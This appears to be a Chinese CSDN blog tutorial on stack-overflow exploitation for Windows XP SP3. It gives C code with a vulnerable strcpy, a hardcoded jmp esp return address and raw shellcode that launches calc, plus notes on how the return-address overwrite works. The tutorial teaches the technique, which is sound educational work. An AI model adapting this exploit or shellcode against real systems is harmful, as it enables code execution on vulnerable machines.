漏洞利用—栈溢出

最新推荐文章于 2024-08-27 17:21:52 发布
最新推荐文章于 2024-08-27 17:21:52 发布
阅读量475 收藏 1
点赞数
分类专栏: 漏洞原理笔记 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/musilintan/article/details/116245017
版权

下面的代码可以在xp sp3系统上运行测试:

int vulnfun(char* str)
{
	char stack[10];
	strcpy(stack, str);

	return 0;
}

int main()
{
	unsigned char shellcode[] =
		"\x55\x8B\xEC\x33\xC0\x50\x50\x50\xC6\x45\xF4\x4D\xC6\x45\xF5\x53"
		"\xC6\x45\xF6\x56\xC6\x45\xF7\x43\xC6\x45\xF8\x52\xC6\x45\xF9\x54\xC6\x45\xFA\x2E\xC6"
		"\x45\xFB\x44\xC6\x45\xFC\x4C\xC6\x45\xFD\x4C\xBA"
		"\x7b\x1d\x80\x7c"
		"\x52\x8D\x45\xF4\x50"
		"\xFF\x55\xF0"
		"\x55\x8B\xEC\x83\xEC\x2C\xB8\x63\x61\x6C\x63\x89\x45\xF4\x33\xC0\x89\x45\xF8"
		"\x8D\x45\xF4"
		"\x50\xB8"
		"\xc7\x93\xbf\x77"
		"\xFF\xD0";

	char *strSelf = "AAAAAAAAAAAAAAAA";
	char strJmp[4] = { 0x13, 0x44, 0x87, 0x7C};
	
	char strOverflow[1024] = { 0 };
	memcpy(strOverflow, strSelf, strlen(strSelf));
	memcpy(strOverflow + strlen(strSelf), strJmp, 4);
	memcpy(strOverflow + strlen(strSelf) + 4, shellcode, sizeof(shellcode) - 1);

	//溢出点
	vulnfun(strOverflow);

	return 0;
}

1)shellcode功能为弹出一个计算器calc。
2)strJmp地址0x7C874413指向的是jmp esp指令。溢出利用的关键在于覆盖返回地址,而这个地址需要是一个固定地址,因为传入的字符串是无法知道相对地址的。所以要在整个exe中搜索“jmp esp”指令也就是“FF E4”二进制。找到后,就可以将返回地址指向“jmp esp”。
3)在覆盖返回地址后,紧跟着的就是shellcode代码。而此时的esp就是指向的shellcode。所以就需要“jmp esp”来定位到shellcode上。
4)栈溢出漏洞利用过程:溢出->覆盖返回地址->jmp esp/call esp->shellcode

孤月丶星辰
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
专栏目录
ELF栈溢出及其利用
qq_39596232的博客
08-08 570
实验目的: 在此探究栈溢出原理以及利用 实验环境: Ubuntu18.04 实验内容: 1、实验用的小程序: //rop1.c #include <stdio.h> #include <stdlib.h> #include <unistd.h> void vulnerable_function() { char buf[12...
初识栈溢出及利用栈溢出的四种攻击方法
Kni9hT's Blog
07-22 5826
栈溢出 本质: 混淆了用户输入与栈上的元数据 产生原因: 用户输入的数据大小超过了程序预留的空间大小 利用: 覆盖返回地址 覆盖栈上的变量,例如函数指针或对象指针 基本栈溢出漏洞实例:实际演示 stack_shellcode 以python语言举例, 运行报错。 据我理解,在python中,函数调用一次,栈(stack)多加一层栈帧,由于栈帧的增加有上限,函数调用次数过多会导致栈溢出。(在c语...
简单栈溢出利用
weixin_34138377的博客
07-28 116
#include<stdlib.h> #include<string.h> voidfun(char*name){ charbuf[10]; strcpy(buf,name); printf("%s\n",buf); } voidhack(){ printf("flag\n"); } intmain(){ ...
栈溢出及其利用方式
qq_42882717的博客
03-17 607
栈溢出漏洞及其利用方式
栈溢出的初步利用
weixin_30565327的博客
04-08 88
栈溢出的初步利用 我们接着上面的栈溢出原理来进行讲解栈溢出的利用,首先我们不会接着上一篇的文章的例子来进行讲解,我会再写一个C语言的例子来进行讲解。再进行讲一遍栈溢出的原理。更加熟悉栈溢出的原理能够让我们更好地利用栈溢出。 下面的例子代码如下:(代码很简单我不做解释) #include <stdio.h> #include<string.h> ...
栈溢出漏洞介绍与利用
这里没人
05-14 4379
简介 栈溢出,0day漏洞中最简单的一种漏洞。相比起其它漏洞栈溢出最容易被出现,也最容易利用。是一种非常常见的漏洞。一般如果服务器程序出现了栈溢出漏洞,那么这台服务器距离被pwn也不远了。 原理 栈溢出的主要产生原因是因为程序对用户输入字符串的长度检查不严格,或者有逻辑漏洞,或者一些菜鸟根本没有进行长度检查而产生的漏洞。相信新手程序员一般都写过这样的代码。 char dest[...
栈溢出基础知识、栈溢出保护机制、栈溢出利用方法.docx
01-10
4. **Position Independent Code (PIC)**:生成的代码不依赖于绝对地址,减少攻击者直接利用栈地址的可能。 ### 三、栈溢出利用方法 尽管有这些保护机制,攻击者仍然有可能找到绕过的方法,如: 1. **Return-...
栈溢出漏洞
03-30
在“湖湘杯2016网络安全技能大赛pwnme”中,参赛者可能需要通过利用栈溢出漏洞来解决挑战。 栈是计算机内存中的一个区域,用于存储函数调用时的局部变量和返回地址。当一个函数调用另一个函数时,会将返回地址压...
二进制漏洞挖掘-栈溢出-开启NX未开启ASLR1
08-04
在这个场景中,我们关注的是在一个开启NX(No eXecute,防止栈上数据被执行)但未开启ASLR(Address Space Layout Randomization,地址空间布局随机化)的环境中如何利用栈溢出漏洞。NX技术使得栈上的数据无法直接...
软件安全实验——栈溢出漏洞利用
Fng的博客
08-29 2528
已知目标主机(Microsoft Windows XP SP3)运行着CCProxy 6.2(演示版),且Microsoft Windows XP SP3内存0x7FFA4512处有一条JMP ESP指令,要求以"JMP ESP"为攻击跳板利用该栈溢出漏洞,攻击目标主机,在目标主机上创建一个用户(用户名为a)。
栈溢出原理和利用学习
热门推荐
sinat_31054897的博客
09-05 1万+
做PWN题经常遇到栈溢出,有时一些栈的基础知识总是记不清楚,脑子卡顿,所以整理一番,让自己彻底记住它! 1. 什么是栈? 栈,即堆栈,是一种具有一定规则的数据结构,它按照先进后出的原则存储数据,先进入的数据被压入栈底,最后的数据在栈顶。 堆栈数据结构的两种基本操作: PUSH:将数据压入栈顶 POP :将栈顶数据弹出 知道了什么是栈,我们看看栈在内存中是怎样一个分布情况。 以Linu...
栈溢出漏洞原理详解与利用
蚁景网安学院
05-06 1186
和我一样,有一些计算机专业的同学可能一直都在不停地码代码,却很少关注程序是怎么执行的,也不会考虑到自己写的代码是否会存在栈溢出漏洞,借此机会我们一起走进栈溢出
Linux栈溢出漏洞利用详解
ShadowBlade
09-04 4139
本节主要讲解了linux 32位系统栈溢出的利用原理。以一个实例,详细描述了linux栈溢出的原理和应用。 1.栈溢出背景知识 栈 栈又称堆栈,由编译器自动分配释放,行为类似数据结构中的栈(先进后出)。堆栈主要有三个用途: 为函数内部声明的非静态局部变量(C语言中称“自动变量”)提供存储空间。 记录函数调用过程相关的维护性信息,称为栈帧(Stack Frame)或过程活动记录(Procedure Activation Record)。它包括函数返回地址,不适合装入寄...
重谈堆栈方向和栈溢出的利用(栈溢出攻击原理)
星空_MAX
03-30 2214
一般情况下,栈是从高地址向低地址增长,堆是从低地址向高地址增长 程序员习惯从低向高去读写内存,所以堆就是从低向高增长,而栈对此并不敏感,所以会有此内存布局
【软件与系统安全】上机作业practice1-栈溢出利用的分析_简单栈溢出实验
最新发布
zzz6583zz的博客
08-27 982
本次栈溢出攻击实验,有以下关键点:在编译时使用了(启用可执行堆栈)和(禁用栈保护)选项程序运行时关闭 ALSR(地址空间随机化),导致 shellcode 的地址可以直接确定stack 程序中的 bof 函数存在栈溢出漏洞,修改 bof 函数的返回地址后,可以使程序一步步跳转到 shellcode 位置,从而实现栈溢出攻击,得到shell学习计划安排我一共划分了六个阶段,但并不是说你得学完全部才能上手工作,对于一些初级岗位,学到第三四个阶段就足矣~
缓冲区溢出漏洞攻击——Shellcode编写
pianogirl123的博客
12-19 1万+
一、实验内容利用一个程序漏洞,编写shellcode,达成效果:蹦出对话框,显示“You have been hacked!(by JWM)”二、实验原理因为输入了过长的字符,而缓冲区本身又没有有效的验证机制,导致过长的字符覆盖了返回地址。如果覆盖的返回地址是一个有效地址,而在该地址处又有有效的指令,那么系统就会毫不犹豫地跳到该地址处去执行指令。本次实验中用到了跳板(jmp esp)由于操作系统每次
【七日打卡】Pwn之栈溢出利用详解
阿道夫的博客
12-22 982
🖥栈是汇编语言中的一种数据结构,遵循LIFO(Last in Fist Out)原则,即后进先出。压栈(Push)、出栈(Pop)。📌注意:栈从高地址向低地址存储。
最简单的一个堆栈溢出攻击实例 (1) [by Progsoft]
ProgSoft
11-18 3105
下列出一个简单的利用自身堆栈溢出漏洞,攻击自己的程序。编译使用环境Windows2000/WindowsXP/VC6.0以下代码直接编译就可以产生简单攻击效果。正常无溢出程序,弹出OK对话框,当然需要你将aucName数组0xFE结束符添加并不使其溢出。溢出Debug版程序,弹出DBG HelloWorld!对话框,选择Debug编译即可。溢出Release程序,弹出HelloW
掌握软件漏洞栈溢出利用入门教程
本文档是一篇针对初学者的"栈溢出利用软件漏洞分析入门"教程,旨在帮助读者理解并掌握这一关键的网络安全领域知识。首先,文章从引子部分开始,强调了软件漏洞分析的重要性,它不仅能帮助我们理解黑客如何利用系统...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

孤月丶星辰

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值